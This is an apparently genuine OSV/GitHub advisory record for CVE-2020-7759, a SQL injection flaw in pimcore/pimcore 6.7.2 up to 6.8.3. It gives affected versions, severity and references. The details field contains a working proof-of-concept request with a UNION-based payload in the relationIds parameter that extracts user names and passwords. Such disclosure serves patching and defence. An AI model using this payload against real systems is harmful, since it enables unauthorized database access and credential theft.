原始 OSV JSON
{
"id": "GHSA-8jmh-c6vr-pmvm",
"aliases": [
"CVE-2020-7759"
],
"details": "\"The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{\"keyId\"%3a\"''\",\"groupId\"%3a\"'asd'))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,'',11,12,'',14+from+users)+--+\"}]\"",
"summary": "SQL Injection in pimcore",
"affected": [
{
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "6.7.2"
},
{
"fixed": "6.8.3"
}
]
}
],
"package": {
"name": "pimcore/pimcore",
"ecosystem": "Packagist"
}
}
],
"modified": "2021-04-20T17:18:14Z",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
"published": "2021-05-06T18:53:55Z",
"references": [
{
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7759",
"type": "ADVISORY"
},
{
"url": "https://github.com/pimcore/pimcore/pull/7315",
"type": "WEB"
},
{
"url": "https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1017405",
"type": "WEB"
}
],
"schema_version": "1.4.0",
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"severity": "HIGH",
"github_reviewed": true,
"nvd_published_at": "2020-10-30T11:15:00Z",
"github_reviewed_at": "2021-04-20T17:18:14Z"
}
}